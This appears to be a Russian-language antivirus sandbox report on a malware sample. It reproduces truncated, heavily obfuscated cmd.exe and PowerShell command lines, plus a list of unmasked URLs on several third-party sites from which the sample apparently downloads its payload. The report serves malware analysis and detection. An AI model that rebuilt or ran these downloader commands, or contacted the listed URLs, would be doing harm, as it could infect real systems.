Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\cmd.exe; ;;;;/V:;;/C";;;;;(;(s^e^t ^u^M4^9= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^tac^}}ka^er^b;^Pw^d$ s^s^ecorP^-tr^at^S;^)Pw^d^$^(e^lif^o^t^evas^.M^Ol^$;^)y^d^oB^esno^ps^er^.^i^T^G$...
Сетевая активность
Подключается к
- 'bo##e.com':80
- 'bo##e.com':443
- 'me##.com.pk':80
- 'fo###tbooks.cn':80
- 'to####anservice.ch':80
TCP
Запросы HTTP GET
- http://bo##e.com/wordpress/LqrWxW6S
- http://www.me##.com.pk/BNcHza7
- http://fo###tbooks.cn/YanSDST0x
- http://www.to####anservice.ch/32H29R14
UDP
- DNS ASK bo##e.com
- DNS ASK me##.com.pk
- DNS ASK fo###tbooks.cn
- DNS ASK to####anservice.ch
- DNS ASK uw####drukwerk.frl
Другое
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' ; ;;;;\V:;;\C";;;;;(;(s^e^t ^u^M4^9= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^tac^}}ka^er^b;^Pw^d$ s^s^ecorP^-tr^at^S;^)Pw^d^$^(e^lif^o^t^evas^.M^Ol^$;^)y^d^oB^esno^ps^er^.^i^T^G$^(^et^ir^w.^M^O^l^$;1...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $ZAJ='EIa';$SKL='http://borje.com/wordpress/LqrWxW6S@http://www.meer.com.pk/BNcHza7@http://forestbooks.cn/YanSDST0x@http://www.topcleanservice.ch/32H29R14@http://www.uwrouwdrukwerk.frl/kt9jsOBd...
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\cmd.exe; ;;;;/V:;;/C";;;;;(;(s^e^t ^u^M4^9= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^tac^}}ka^er^b;^Pw^d$ s^s^ecorP^-tr^at^S;^)Pw^d^$^(e^lif^o^t^evas^.M^Ol^$;^)y^d^oB^esno^ps^er^.^i^T^G$... (со скрытым окном)
